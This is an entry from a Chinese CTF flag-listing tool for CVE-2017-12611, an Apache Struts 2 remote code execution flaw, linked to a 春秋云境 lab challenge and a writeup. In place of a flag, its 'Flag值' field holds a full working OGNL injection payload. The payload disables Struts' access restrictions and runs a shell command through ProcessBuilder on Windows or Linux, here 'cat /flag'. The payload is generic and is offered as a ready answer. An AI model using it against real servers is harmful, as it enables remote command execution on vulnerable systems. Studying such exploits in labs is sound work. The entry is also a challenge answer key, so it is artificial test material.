[随波逐流]CTF Flags

   [随波逐流]CTF Flags

软件版本:v1.0.0   数据版本: v20260201
我要添加Flag 下    载
返    回

CVE-2017-12611

 广告模块
天天开红包最高25888元
ID: 14762
标题: CVE-2017-12611
描述: 在 Apache Struts 2.0.0 到 2.3.33 和 2.5 到 2.5.10.1 中,在 Freemarker 标记中使用无意的表达式而不是字符串文字可能会导致 RCE 攻击。
类型: WEB
网站: 春秋云境
题目链接: https://yunjing.ichunqiu.com/cvevip
赛事: 春秋云境
年度: None
Flag值: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /flag').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
writeup: https://cloud.tencent.com/developer/article/2197868
答案错误,我要更正